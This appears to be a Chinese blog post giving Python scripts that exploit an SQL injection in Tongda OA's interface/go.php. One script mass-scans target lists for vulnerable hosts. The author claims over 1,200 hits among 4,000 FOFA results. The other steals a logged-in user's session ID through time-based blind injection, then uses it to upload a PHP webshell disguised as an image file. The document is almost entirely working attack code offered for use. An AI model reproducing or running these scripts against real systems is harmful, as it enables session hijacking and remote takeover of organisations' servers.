通达OA interface/go.php 注入漏洞批量检测脚本+利用

目录

批量检测：

稍微改动下，getshell脚本：

---

python写的，fofa 4000目标检测出来1200+存在：

批量检测：

# -*- coding: utf-8 -*-
import requests,sys
import argparse
import urllib3
import ssl
import vthread


urllib3.disable_warnings()
ssl._create_default_https_context = ssl._create_unverified_context

headers = {
    "Content-Type":"application/x-www-form-urlencoded"
}

session = ""

def isLogin(host):
    try:
        r = requests.get(url="{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if((select count(UID) from user_online)=0%252csleep(20)%252c1)+%23%25%252727".format(url=host),timeout = 10,headers=headers)
        return True
    except requests.exceptions.ReadTimeout:
        return False


@vthread.pool(10)
def GetSession(url):
    
    global session
    if isLogin(url):
        print("存在用户登录......")
        with open('純在漏洞.txt',"a") as a:    #设置文件对象
            str = a.write(url + "\n")
    else:
        print("没有用户登录")




if __name__ == "__main__":
    f = open(input())  
    lines = f.readlines()
    for line in lines:
        
        line = line.strip()
        if "http" not in line:
            line = "http://" + line
        
        GetSession(line)
        

稍微改动下，getshell脚本：

# -*- coding: utf-8 -*-
import requests,sys
import argparse
import urllib3
import ssl
urllib3.disable_warnings()
ssl._create_default_https_context = ssl._create_unverified_context

headers = {
    "Content-Type":"application/x-www-form-urlencoded"
}

session = ""

def isLogin(host):
    try:
        r = requests.get(url="{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if((select count(UID) from user_online)=0%252csleep(20)%252c1)+%23%25%252727".format(url=host),timeout = 10,headers=headers)
        return True
    except requests.exceptions.ReadTimeout:
        return False



def GetSession(url):
    global session
    if isLogin(url):
        print("存在用户登录......")
        for i in range(27):
            for x in range(48,128):
                sql = "{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if(ascii(mid((select sid from user_online limit 0%252c1)%252c{mid}%252c1))={ascii}%252csleep(20)%252c1)+%23%25%252727".format(
                    url=url, mid=i, ascii=x)
                try:
                    r = requests.get(url = sql,timeout=18,headers=headers)
                except requests.exceptions.ReadTimeout:
                    print("编码:"+str(x))
                    print("sql:"+sql)
                    session += chr(x)
                    break
            print("session:"+session)
            print("--------------------------------------------------------")
        print("OK:",session)
    else:
        print("没有用户登录")


def upload(url,file):
    if len(session) < 20:
        print("session不完整，请重新获取....")
        return
    with open(file,"rb") as file:
        print("开始上传文件...")
        file = [('FILE1',('shell.php. ',file,'image/png'))]
        r = requests.post(url="{url}/general/reportshop/utils/upload.php?action=upload&filetype=xls".format(url=url),headers={"cookie":"PHPSESSID="+session},files=file)
        if "true" in r.text:
            print("上传成功,shell地址:8750端口 \\attachment\\reportshop\\templates\\shell.php")
        else:
            print(r.text)

if __name__ == "__main__":
    Usage = 'python3 1.py -u url -f file'
    parser = argparse.ArgumentParser(description = Usage)
    parser.add_argument('-u', '--url', type=str, required=True, help='e.g. The website home page. 172.16.203.147')
    parser.add_argument('-f', '--file', type=str, required=True, help='Path to ')
    args = parser.parse_args()

    url = args.url
    file = args.file
    GetSession(url)
    upload(url,file)